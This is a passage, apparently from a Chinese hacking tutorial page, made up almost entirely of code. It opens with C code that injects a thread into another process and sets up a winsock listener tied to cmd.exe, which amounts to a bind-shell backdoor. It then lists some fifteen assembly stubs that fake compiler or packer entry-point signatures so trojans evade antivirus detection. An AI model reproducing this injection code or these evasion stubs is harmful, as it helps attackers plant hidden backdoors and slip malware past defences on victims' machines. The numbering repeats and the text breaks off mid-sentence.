|MEM_RESERVE,PAGE_EXECUTE_READWRITE);if(!pRemoteThread)return 0; // 将线程执行体ThreadProc 写入远程进程if(!WriteProcessMemory(hRemoteProcess, pRemoteThread, &ThreadProc, THREADSIZE,0))return 0; ZeroMemory(&myRemotePara,sizeof(RemotePara)); hKernel = LoadLibrary( "kernel32.dll"); myRemotePara.dwLoadLibrary =(DWORD)GetProcAddress(hKernel, "LoadLibraryA"); myRemotePara.dwFreeLibrary =(DWORD)GetProcAddress(hKernel, "FreeLibrary"); myRemotePara.dwGetProcAddress =(DWORD)GetProcAddress(hKernel, "GetProcAddress"); myRemotePara.dwGetModuleHandle =(DWORD)GetProcAddress(hKernel, "GetModuleHandleA"); myRemotePara.dwCreateProcessA =(DWORD)GetProcAddress(hKernel, "CreateProcessA"); myRemotePara.dwPeekNamedPipe =(DWORD)GetProcAddress(hKernel, "PeekNamedPipe"); myRemotePara.dwWriteFile =(DWORD)GetProcAddress(hKernel, "WriteFile"); myRemotePara.dwReadFile =(DWORD)GetProcAddress(hKernel, "ReadFile"); myRemotePara.dwCloseHandle =(DWORD)GetProcAddress(hKernel, "CloseHandle"); myRemotePara.dwCreatePipe =(DWORD)GetProcAddress(hKernel, "CreatePipe"); myRemotePara.dwTerminateProcess =(DWORD)GetProcAddress(hKernel, "TerminateProcess"); hSock = LoadLibrary("wsock32.dll"); myRemotePara.dwWSAStartup =(DWORD)GetProcAddress(hSock,"WSAStartup"); myRemotePara.dwSocket =(DWORD)GetProcAddress(hSock,"socket"); myRemotePara.dwhtons =(DWORD)GetProcAddress(hSock,"htons");myRemotePara.dwbind =(DWORD)GetProcAddress(hSock,"bind"); myRemotePara.dwlisten =(DWORD)GetProcAddress(hSock,"listen"); myRemotePara.dwaccept =(DWORD)GetProcAddress(hSock,"accept"); myRemotePara.dwrecv =(DWORD)GetProcAddress(hSock,"recv"); myRemotePara.dwsend =(DWORD)GetProcAddress(hSock,"send"); myRemotePara.dwclosesocket =(DWORD)GetProcAddress(hSock,"closesocket"); hUser32 = LoadLibrary("user32.dll");myRemotePara.dwMessageBox =(DWORD)GetProcAddress(hUser32, "MessageBoxA"); strcat(myRemotePara.strMessageBox,"Sucess!\\0"); strcat(myRemotePara.winsockDll,"wsock32.dll\\0"); strcat(myRemotePara.cmd,"cmd.exe\\0");strcat(myRemotePara.telnetmsg,"ConnectSucessful!\\n\\0"); //写进目标进程pRemotePara=(RemotePara *)VirtualAllocEx (hRemoteProcess ,0,sizeof(RemotePara),MEM_COMMIT,PAGE_READWRITE); if(!pRemotePara)return 0;if(!WriteProcessMemory(hRemoteProcess ,pRemotePara,&myRemotePara,sizeof myRemotePara,0))return 0; // 启动线程hThread = CreateRemoteThread(hRemoteProcess ,0,0,(DWORD(__stdcall *)(void*))pRemoteThread ,pRemotePara,0,&byte_write); while(1) {} FreeLibrary(hKernel); FreeLibrary(hSock); FreeLibrary(hUser32); CloseHandle(hRemoteProcess); CloseHandle(hToken); return 0; } BOOL EnablePrivilege(HANDLE hToken,LPCTSTR szPrivName,BOOL fEnable){ TOKEN_PRIVILEGES tp;tp.PrivilegeCount = 1;LookupPrivilegeValue(NULL,szPrivName,&tp.Privileges[0].L uid); tp.Privileges[0].Attributes = fEnable ?SE_PRIVILEGE_ENABLED:0;AdjustTokenPrivileges(hToken,FALSE,&tp,sizeof(tp),NULL, NULL); return((GetLastError() == ERROR_SUCCESS)); } DWORD GetPidByName(char *szName) { HANDLE hProcessSnap = INVALID_HANDLE_VALUE; PROCESSENTRY32 pe32={0}; DWORD dwRet=0; hProcessSnap=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); if(hProcessSnap == INVALID_HANDLE_VALUE)return 0; pe32.dwSize = sizeof(PROCESSENTRY32);if(Process32First(hProcessSnap, &pe32)) { do{ if(StrCmpNI(szName,pe32.szExeFile,strlen(szName))==0) { dwRet=pe32.th32ProcessID; break; } }while (Process32Next(hProcessSnap,&pe32)); } else return 0;if(hProcessSnap !=INVALID_HANDLE_VALUE)CloseHandle (hProcessSnap); return dwRet; 1.伪装vc++5.0 代码:PUSH EBP MOV EBP,ESP PUSH -1 push 415448 -\___ PUSH 4021A8 -/ 在这段代码中类似这样的操作数可以乱填MOV EAX,DWORD PTR FS:[0] PUSH EAX MOV DWORD PTR FS:[0],ESP ADD ESP,-6C PUSH EBX PUSH ESI PUSH EDI ADD BYTE PTR DS:[EAX],AL /这条指令可以不要! jmp 原入口地址*********************************************** ************************* 2.胡乱跳转代码:nop push ebp mov ebp,esp inc ecx push edx nop pop edx dec ecx pop ebp inc ecx loop somewhere /跳转到上面那段代码地址去!somewhere: nop /"胡乱"跳转的开始... jmp 下一个jmp 的地址/在附近随意跳jmp ... /... jmp 原入口地址/跳到原始oep 90 55 8B EC 41 52 90 5A 49 5D 41 转储免杀*********************************************** ************************* 3.伪装c++代码:push ebp mov ebp,esp push -1 push 111111 push 222222 mov eax,fs:[0] push eax mov fs:[0],esp pop eax mov fs:[0],eax pop eax pop eax pop eax pop eax mov ebp,eax jmp 原入口地址*********************************************** ************************* 4.伪装Microsoft VisualC++ 6.0 代码:PUSH -1 PUSH 0 PUSH 0 MOVEAX,DWORD PTR FS:[0] PUSH EAX MOV DWORD PTR FS:[0],ESP SUB ESP,68 PUSH EBX PUSH ESI PUSH EDI POP EAX POP EAX POP EAX ADD ESP,68 POP EAX MOV DWORD PTR FS:[0],EAX POP EAX POP EAX POP EAX POP EAX MOV EBP,EAX JMP 原入口地址push ebp mov ebp,esp jmp*********************************************** ************************* 5.伪装防杀精灵一号防杀代码:push ebp mov ebp,esp push -1 push 666666 push 888888 mov eax,dword ptr fs:[0] push eax mov dword ptr fs:[0],esp pop eax mov dword ptr fs:[0],eax pop eax pop eax pop eax pop eax mov ebp,eax jmp 原入口地址*********************************************** ************************* 6.伪装防杀精灵二号防杀代码:push ebp mov ebp,esp push -1 push 0 push 0 mov eax,dword ptr fs:[0] push eax mov dword ptr fs:[0],esp sub esp,68 push ebx push esi push edi pop eax pop eax pop eax add esp,68 pop eax mov dword ptr fs:[0],eax pop eax pop eax pop eax pop eax mov ebp,eax jmp 原入口地址*********************************************** ************************* 7.伪装木马彩衣(无限复活袍)代码:PUSH EBP MOV EBP,ESP PUSH -1 push 415448 -\___ PUSH 4021A8 -/ 在这段代码中类似这样的操作数可以乱填MOV EAX,DWORD PTR FS:[0] PUSH EAX MOV DWORD PTR FS:[0],ESP ADD ESP,-6C PUSH EBX PUSH ESI PUSH EDI ADD BYTE PTR DS:[EAX],AL /这条指令可以不要! jo 原入口地址jno 原入口地址call 下一地址*********************************************** ************************* 8.伪装木马彩衣(虾米披风)代码:push ebp nop nop mov ebp,esp inc ecx nop push edx nop nop pop edx nop pop ebp inc ecx loop somewhere /跳转到下面那段代码地址去!someshere: nop /"胡乱"跳转的开始... jmp 下一个jmp 的地址/在附近随意跳jmp ... /... jmp 原入口的地址/跳到原始oep 9.伪装花花添加器(神话)代码:-----------根据C++改nop nop nop mov ebp,esp push -1 push 111111 push 222222 mov eax,dword ptr fs:[0]push eax mov dword ptr fs:[0],esp pop eax mov dword ptr fs:[0],eax pop eax pop eax pop eax pop eax mov ebp,eax mov eax,原入口地址push eax retn*********************************************** ************************* 10.伪装花花添加器(无极)代码:nop mov ebp, esp push -1 push 0A2C2A push0D9038 mov eax, fs:[0] push eax mov fs:[0], esp pop eax mov fs:[0], eax pop eax pop eax pop eax pop eax mov ebp, eax mov eax, 原入口地址jmp eax*********************************************** ************************* 11.伪装花花添加器(金刚)代码:--------根据VC++5.0 改nop nop mov ebp, esp push -1 push 415448 push 4021A8 mov eax, fs:[0] push eax mov fs:[0], esp add esp, -6C push ebx push esi push edi add [eax], al mov eax,原入口地址jmp eax*********************************************** ************************* 12.伪装花花添加器(杀破浪)代码:nop mov ebp, esp push -1 push 0 push 0 mov eax, fs:[0] push eax mov fs:[0], esp sub esp, 68 push ebx push esi push edi pop eax pop eax pop eax add esp, 68 pop eax mov fs:[0], eax pop eax pop eax pop eax pop eax mov ebp, eax mov eax, 原入口地址jmp eax*********************************************** ************************* 12.伪装花花添加器(痴情大圣)代码:nop ..........省略N 行nop nop push ebp mov ebp, esp add esp, -0C add esp, 0C mov eax, 原入口地址push eax retn*********************************************** ************************* 13.伪装花花添加器(如果*爱)代码:nop ........省略N 行nop nop push ebp mov ebp, esp inc ecx push edx nop pop edx dec ecx pop ebp inc ecx mov eax, 原入口地址jmp eax*********************************************** ************************* 14.伪装PEtite 2.2 -> Ian Luck 代码:mov eax,0040E000 push 004153F3 push dword ptr fs:[0] mov dword ptr fs:[0],esp pushfw pushad push eax xor ebx,ebx pop eax popad popfw pop dword ptr fs:[0] pop eax jmp 原入口地址'执行到程序的原有OEP*********************************************** ************************* 15.无效PE 文件代码:push ebp mov ebp,esp inc ecx push edx nop pop edx dec ecx pop ebp inc ecx MOV DWORD PTR FS:[0],EAX \ POP EAX | POP EAX \ MOV DWORD PTR FS:[0],EAX |(注意了。

相关文档
最新文档